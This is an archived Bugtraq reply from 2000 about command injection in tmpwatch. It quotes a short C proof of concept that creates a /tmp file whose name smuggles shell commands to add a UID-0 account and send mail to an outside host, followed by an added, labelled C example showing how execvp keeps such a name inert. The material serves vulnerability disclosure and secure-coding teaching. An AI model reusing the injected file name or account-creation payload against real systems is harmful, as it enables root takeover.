[17133] in bugtraq
Re: tmpwatch executes shell commands
daemon@ATHENA.MIT.EDU (Mike M. Quimson)
Tue Oct 10 13:08:34 2000
Message-Id: <39E2C5D5.CD21B3ED@isentry.ph>
Date: Tue, 10 Oct 2000 15:31:34 +0800
Reply-To: "Mike M. Quimson" <mike@ISENTRY.PH>
From: "Mike M. Quimson" <mike@ISENTRY.PH>
X-To: "Alexander Y. Yurchenko" <grange@RT.MIPT.RU>
To: BUGTRAQ@SECURITYFOCUS.COM
What version of tmpwatch is affected by this?
"Alexander Y. Yurchenko" wrote:
> Here is a simple example of my playing with the tmpwatch bug
>
> 1. Execute the following in /tmp
>
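> #include <stdio.h>
> #include <stdlib.h>
>
> int main()
> {
>     FILE *f;
>     /* File name made of shell metacharacters and commands */
>     char filename[100] = ";useradd -u 0 -g 0 haks0r;mail haks0r@somehost.com<blablabla";
>
>     /* Create an empty file with that name in the current directory */
>     if((f = fopen(filename, "a")) == 0) {
>         perror("Could not create file");
>         exit(1);
>     }
>     fclose(f);
>     return 0;
> }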
>
> 2. cp /usr/sbin/adduser /tmp
> 3. Just wait for mail ;-)
>
> ---<*>---
> grange
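
An added example, not part of the original thread and not tmpwatch's own code: assuming the cleaner hands each file name to a helper program, it shows that running the helper through fork/execvp keeps a name shaped like the one in the PoC as a single argument instead of shell syntax. The sample name, the `helper -s` command line and the use of printf(1) as a stand-in helper are constructed for illustration.

```c
/* Added example (not tmpwatch code): untrusted file name as one argv element. */
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Constructed, harmless name shaped like the PoC's: ';' separators and '<'. */
static const char *SAMPLE_NAME = ";echo injected;true<nonexistent";

/* Unsafe pattern (assumed): the line a shell would parse. Built, never run.
   "helper -s" is a hypothetical command. */
int build_shell_line(char *out, size_t n, const char *name)
{
    return snprintf(out, n, "helper -s %s", name);
}

/* Hardened pattern: fork + execvp, no shell. printf(1) stands in for the helper;
   what it received is copied into buf. Returns its exit status, -1 on error. */
int run_helper_argv(const char *name, char *buf, size_t n)
{
    int fds[2], status;
    size_t used = 0; ssize_t r; pid_t pid;
    if (n == 0 || pipe(fds) < 0) return -1;
    if ((pid = fork()) < 0) { close(fds[0]); close(fds[1]); return -1; }
    if (pid == 0) {
        char *const argv[] = { "printf", "%s", (char *)name, NULL };
        dup2(fds[1], STDOUT_FILENO);
        close(fds[0]); close(fds[1]);
        execvp(argv[0], argv);
        _exit(127);                       /* exec failed */
    }
    close(fds[1]);
    while (used < n - 1 && (r = read(fds[0], buf + used, n - 1 - used)) > 0)
        used += (size_t)r;
    buf[used] = '\0';
    close(fds[0]);
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status)) return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    char line[128], got[128];
    build_shell_line(line, sizeof line, SAMPLE_NAME);
    printf("shell would parse: %s\nargv helper exit %d, ", line, run_helper_argv(SAMPLE_NAME, got, sizeof got));
    printf("received: %s\n", got);
    return 0;
}
```

In the first function the `;` characters end the helper's command and start new ones once a shell parses the line; in the second the helper receives the whole name byte for byte.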